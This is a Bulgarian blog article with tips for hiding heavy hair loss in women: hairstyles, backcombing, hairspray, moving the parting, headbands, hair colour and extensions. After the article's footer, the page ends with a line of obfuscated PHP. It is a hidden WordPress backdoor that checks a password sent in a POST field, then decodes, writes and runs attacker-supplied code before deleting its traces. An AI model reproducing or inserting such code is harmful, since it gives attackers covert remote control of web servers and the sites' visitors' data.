Как да прикриете вредите от обилния косопад | Косопад

Как да прикриете вредите от обилния косопад

Различни фактори могат да засегнат косопада при жените като правят косата тънка, рядка и се появяват полуоголени зони по главата. Ако искаш да изглежда, че имаш повече коса, ви предлагаме някои идеи, прически и цветове

прически

Здрава, енергична и жива коса с обем без съмнение е една от прелестите на жените. Наследствеността и външни фактори като неправилно хранене, стрес и злоупотреба с козметични продукти, могат да предизвикат аномалии като обилен косопад.

Ето някои идеи как да прикриете разредените части по главата:

Късата коса или със средна дължина са най- препоръчителните в тези случаи. По- трудно е да придадете обем на дълга коса. Колкото по- дълга е, толкова по- тежка е и е по- голяма тенденцията да отива надолу. При прическите в стил гарсон, обемът е съсредоточен в горната част на главата, така че този тип прически са доста подходящи в такива случаи.

Прическите могат идеално да прикрият проблемните зони. Може да запълните корените в горната част на главата спрически2 малко лак или пяна, да решете косата отдолу нагоре или да промените мястото на пътя, така че да не е в центъра.

При по- сложни прически можете да вдигнете косата нагоре, но без да е много стегнато или да прибегнете до топиране на косата – отличен начин да прикриете рядката коса.

Друг добър вариант е да използвате ленти, диадеми и шноли, чрез които да подредите кичурите така, както искате.

Цветът на косата също може да ви помогне да прикриете голите зони. С по- тъмни цветове, се виждат повече. Най- добре е боядисването тон в тон с различни тонове, които придават дълбочина на определени места.

Доста по- скъпия вариант е да си сложите екстеншъни.

03. януари 2014 12:05:35 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}